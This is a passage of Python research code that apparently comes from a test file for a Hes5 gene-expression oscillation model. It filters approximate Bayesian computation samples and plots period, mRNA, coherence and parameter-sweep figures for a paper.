my_figure = plt.figure(figsize= (5,3))
sns.boxplot(data = [all_periods[all_periods<600], np.array(real_data)*60])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.ylabel('Period [min]')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_for_paper.pdf'))
def xest_plot_agnostic_period_distribution(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that verionica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
my_posterior_samples[:,2]/=10000
real_data = np.array(real_data)*60
sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_periods = my_model_results[:,2]/60
sns.distplot(all_periods[all_periods<10],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = 10)
# plt.gca().set_xlim(-1,2)
plt.axvline(np.mean(real_data)/60)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Modelled period [h]")
plt.xlim(1,10)
plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_agnostic.pdf'))
def xest_plot_period_distribution_for_paper(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
# model_results[:,0]<65000)) #standard deviation
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
# np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3)))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that verionica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
my_posterior_samples[:,2]/=10000
real_data = np.array(real_data)*60
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_periods = my_model_results[:,2]/60
print('mean is')
print(np.mean(all_periods[all_periods<10]))
print('median is')
print(np.median(all_periods[all_periods<10]))
print('data mean is')
print(np.mean(real_data)/60)
period_histogram, bins = np.histogram(all_periods[all_periods<10], bins = 400)
maximum_index = np.argmax(period_histogram)
print('max bin is')
print(bins[maximum_index])
print(bins[maximum_index+1])
print(bins[maximum_index+2])
print(bins[maximum_index-1])
sns.distplot(all_periods[all_periods<10],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = 10)
# plt.gca().set_xlim(-1,2)
plt.axvline(np.mean(real_data)/60)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Modelled period [h]")
plt.xlim(1,10)
# plt.ylim(0,0.8)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_for_paper.pdf'))
def xest_plot_agnostic_mrna_distribution(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# model_results[:,1]>0.05))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))#time_delay
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #time_delay
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_posterior_samples[:,2] /= 10000
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_mrna = my_model_results[:,4]
sns.distplot(all_mrna,
kde = False,
rug = False,
hist_kws = {'edgecolor' : 'black'},
norm_hist = True)
# norm_hist = True,
# bins = 10)
# plt.gca().set_xlim(-1,2)
plt.ylabel("Likelihood" )
plt.xlabel("mean mRNA number")
# plt.xlim(1,80)
# plt.ylim(0,0.06)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution_agnostic.pdf'))
def xest_plot_agnostic_noise_amplitude_correlation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_figure = plt.figure(figsize= (4.5,2.5))
plt.scatter(my_posterior_samples[:,-1],my_model_results[:,1], lw = 0, s = 1, zorder = 0, alpha = 0.2)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('Noise strength [1/min]')
plt.ylabel('std/mean')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','agnostic_noise_vs_amplitude.pdf'),dpi = 400)
def xest_plot_mrna_distribution_for_paper(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_posterior_samples[:,2] /= 10000
weird_index = np.where(my_model_results[:,4]>200)
weird_results = my_model_results[weird_index]
weird_posterior = my_posterior_samples[weird_index]
print(weird_results)
print(weird_posterior)
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_mrna = my_model_results[:,4]
print('minimum and maximum are')
print(np.min(all_mrna))
print(np.max(all_mrna))
print('so many samples above 100')
print(np.sum(all_mrna>100))
mrna_histogram, bins = np.histogram(all_mrna, bins = 400)
maximum_index = np.argmax(mrna_histogram)
print('max bin is')
print(bins[maximum_index])
print(bins[maximum_index+1])
print(bins[maximum_index+2])
print(bins[maximum_index-1])
# sns.distplot(all_mrna[all_mrna<80],
sns.distplot(all_mrna,
kde = False,
rug = False,
hist_kws = {'edgecolor' : 'black'},
norm_hist = True,
# norm_hist = True,
bins = 100)
# plt.gca().set_xlim(-1,2)
plt.ylabel("Likelihood" )
plt.xlabel("mean mRNA number")
plt.xlim(0,100)
plt.ylim(0,0.06)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution_for_paper.pdf'))
def xest_plot_period_distribution_differently(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.1)))))
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that verionica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
my_posterior_samples[:,2]/=10000
real_data = np.array(real_data)*60
sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (6,4))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_periods = my_model_results[:,2]
my_figure.add_subplot(211)
sns.distplot(all_periods[all_periods<600],
kde = False,
rug = False,
norm_hist = True,
bins = 10)
# plt.gca().set_xlim(-1,2)
plt.axvline(np.mean(real_data))
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Modelled period [min]")
plt.xlim(50,600)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(212)
sns.distplot(real_data,
kde = False,
rug = False,
norm_hist = True)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
# plt.gca().set_xlim(0,2.3)
# plt.gca().set_ylim(0,2.0)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.xticks([0,1,2], [r'$10^0$',r'$10^1$',r'$10^2$'])
plt.xlabel("Measured period [min]")
plt.ylabel("Occurrence", labelpad = 20)
plt.xlim(50,600)
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_differently.pdf'))
def xest_plot_mrna_distribution_for_paper(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
sns.set(font_scale = 1.5)
font = {'size' : 28}
plt.rc('font', **font)
all_mrna_levels = my_model_results[:,4]
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
my_figure = plt.figure(figsize= (5,3))
sns.distplot(all_mrna_levels,
kde = False,
rug = False,
norm_hist = True)
# plt.xticks([0,1], ['Model', 'Experiment'])
plt.xlabel('<mRNA>')
plt.ylabel('Likelihood')
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.ylim(0,0.05)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution_for_paper.pdf'))
def xest_make_relative_delay_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_posterior_samples = my_posterior_samples[:10]
my_parameter_sweep_results = hes5.conduct_parameter_sweep_at_parameters('time_delay',
my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
np.save(os.path.join(os.path.dirname(__file__), 'output','extended_relative_sweeps_' + 'time_delay' + '.npy'),
my_parameter_sweep_results)
def xest_make_amplitude_plot(self):
sns.set_style({"xtick.direction": "in","ytick.direction": "in"})
parameter_names = ['protein_degradation_rate']
x_labels = dict()
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'extended_degradation_sweep.npy'))
# 'extended_relative_sweeps_' + parameter_name + '.npy'))
increase_indices = np.where(my_parameter_sweep_results[:,9,3] < 300)
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
x_coord = -0.4
y_coord = 1.1
my_figure = plt.figure( figsize = (4.5, 1.5) )
this_axis = my_figure.add_subplot(121)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,2], color ='teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('COV')
plt.gca().set_rasterization_zorder(1)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.xlim(0,np.log(2)/15.)
# this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.2)
plt.title('stochastic')
# this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(122)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,7], color = 'teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
# this_axis.set_ylabel('Coherence')
plt.title('deterministic')
plt.gca().set_rasterization_zorder(1)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
plt.xlim(0,np.log(2)/15.)
# this_axis.set_ylim(0,0.2)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','amplitude_model_prediction_' + parameter_name + '.pdf'), dpi = 400)
def xest_plot_model_prediction(self):
sns.set_style({"xtick.direction": "in","ytick.direction": "in"})
parameter_names = ['protein_degradation_rate']
x_labels = dict()
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' + parameter_name + '.npy'))
increase_indices = np.where(my_parameter_sweep_results[:,9,3] < 300)
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
x_coord = -0.4
y_coord = 1.1
my_figure = plt.figure( figsize = (4.5, 1.5) )
this_axis = my_figure.add_subplot(121)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(122)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','model_prediction_' + parameter_name + '.pdf'), dpi = 400)
def xest_plot_bifurcation_implementation(self):
sns.set_style({"xtick.direction": "in","ytick.direction": "in"})
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
# my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
# 'narrowed_degradation_sweep.npy'))
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'output',
'extended_degradation_sweep.npy'))
x_coord = -0.3
y_coord = 1.05
for results_table in my_degradation_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
plt.xlim(0,np.log(2)/15.)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
my_figure.add_subplot(132)
hill_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'extended_relative_sweeps_hill_coefficient.npy'))
for results_table in hill_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('rel. Hill coefficient')
plt.axvline( 1.0, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
plt.ylim(0,1)
plt.xlim(0.1,2)
my_figure.add_subplot(133)
delay_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'extended_relative_sweeps_time_delay.npy'))
for results_table in delay_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.axvline( 1.0, color = 'darkblue')
plt.xlabel('rel. Transcription delay')
plt.gca().text(x_coord, y_coord, 'C', transform=plt.gca().transAxes)
plt.ylim(0,1)
plt.xlim(0.1,2)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','extended_bifurcation_illustration.pdf'), dpi = 400)
def xest_plot_bayes_factors_for_models(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_narrowed')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_repeated')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_massive')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
number_of_absolute_samples = len(accepted_indices[0])
print('base model accepted that many indices')
print(number_of_absolute_samples)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate'
x_labels['translation_rate'] = 'Translation rate'
x_labels['repression_threshold'] = 'Repression threshold'
x_labels['time_delay'] = 'Transcription delay'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation'
x_labels['protein_degradation_rate'] = 'Protein degradation'
x_labels['hill_coefficient'] = 'Hill coefficient'
decrease_ratios = dict()
increase_ratios = dict()
bardata = []
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
# 'data',
'output',
# 'narrowed_relative_sweeps_' +
'repeated_relative_sweeps_' +
# 'extended_relative_sweeps_' +
parameter_name + '.npy'))
print('these accepted base samples are')
# number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
# my_parameter_sweep_results[:,9,4] < 0.1))[0])
number_of_absolute_samples = len(np.where(np.logical_or(accepted_model_results[:,2] > 600,
accepted_model_results[:,3] < 0.1))[0])
print(number_of_absolute_samples)
decrease_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,0,3] < 300,
my_parameter_sweep_results[:,0,4] > 0.1)))
# decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
# my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
print('these decrease samples are')
number_of_decrease_samples = len(decrease_indices[0])
print(number_of_decrease_samples)
increase_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,1,3] < 300,
my_parameter_sweep_results[:,1,4] > 0.1)))
# increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
print('these increase samples are')
number_of_increase_samples = len(increase_indices[0])
print(number_of_increase_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
sorted_bars/= np.sum(sorted_bars)
my_figure = plt.figure( figsize = (4.5, 1.5) )
plt.bar(all_positions, sorted_bars[::-1])
sorted_labels.reverse()
# plt.xticks( all_positions + 0.4 ,
plt.xticks( all_positions,
sorted_labels,
rotation = 30,
fontsize = 5,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5, all_positions[-1] + 0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=4)
plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel('Likelihood')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_for_paper.pdf'))
def xest_plot_power_spectra_before(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_narrowed')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_repeated')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
number_of_absolute_samples = len(accepted_indices[0])
# where is coherence less than 0.1 or period larger than 600
new_accepted_indices = np.where(np.logical_or(accepted_model_results[:,2] > 600,
accepted_model_results[:,3] < 0.1))
these_posterior_samples = my_posterior_samples[new_accepted_indices]
#downsample to 100
